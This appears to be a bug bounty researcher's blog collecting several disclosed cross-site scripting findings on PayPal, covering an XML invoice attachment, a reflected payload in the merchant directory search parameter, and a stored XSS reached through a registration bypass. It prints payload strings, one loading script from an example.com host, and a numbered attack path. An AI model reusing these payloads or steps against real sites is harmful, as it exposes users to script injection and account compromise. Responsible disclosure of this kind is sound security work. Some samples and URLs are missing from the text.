Greetings readers, today i want to share with you one of my latest findings on Paypal.com.When creating an invoice Paypal allows the users to upload attachements for the invoices one attachement that they allow is a XML file. What the developer may missed here is that you can actually insert HTML into XML files, the namespace allowing this for XML files is called xmlns and a valid xmlns file would look something like this :
When i uploaded a file with this content and the ending.xml the intepreter on Paypals site executed the Payload (in this case the alert 1). To fullfill the requirements for a bounty you always have to make such a vulnerability exploitable and therefore a risk for other Paypal Users. In this case it was pretty easy, you could either way send the Link to this file directly (it doesn’t matter wether the user is logged in or not) or you send it with the Invoice and wait for the user to klick on it.
Here is the POC i sent in to the Paypal bug bounty team :
If you have have questions on this particular case please don’t hesitate to contact me at patrik.fehrenbach(at)it-securityguard.com
All the best
Dear followers, i found a reflected Cross Site Scripting issue on the new Paypal Directory service (https://www.paypal.com/directory/merchants), with the following Payload:
&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E
The vulnerable Parameter was the q? Parameter, i was able to break the script contex of the page, i think it was because of the &q Parameteter, but i am not sure Paypal fixed this issue to fast so i couldn’t analyze it more in depth :/
https://www.paypal.com/directory/merchants?q=&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E
Here is my POC i sent in to Paypal : hope you enjoyed! If you have any kind of question please don’t hesitate to ask me, either way here or via email at patrik.fehrenbach(at)it-securityguard.com All the best Patrik
"--></style></ script >< script > alert ("XSS ")</ script >
When ending the previous style and script element it was possible to add a new script element and executing the Payload, the complete URL looks like this now :
This one only worked in Firefox, Chrome and IE restricted the execution with the anti XSS feature.
The Bug was categorized as “Out of Scope” for whatever reason.
Hope you enjoyed, if you have any question left, please don’t hesitate to contact me at patrik.fehrenbach(at)it-securityguard.com
i recently discovered a stored cross site scripting vulnerability on Paypal’s core site. The scenario is a bit weird, but i hope to explain everything as good as possible.
But when i tried to fullfill the registration the security module of Paypal showed me an error that there is some kind problem with my request. When i looked at the URL i saw that there was some kind of progress bar
To summarize the progress :
1. Create an account with the malicious Payload
2. At the point where the Paypal systems stops you from continuing erease the URL till /webapps/ (bypassed the Security restriction)
3. Create an invoice, send it to the victim
4. Victim logs into the the Account and the Payload gets executed
I did a small POC Video which describes the impact :
I hope you enjoyed 🙂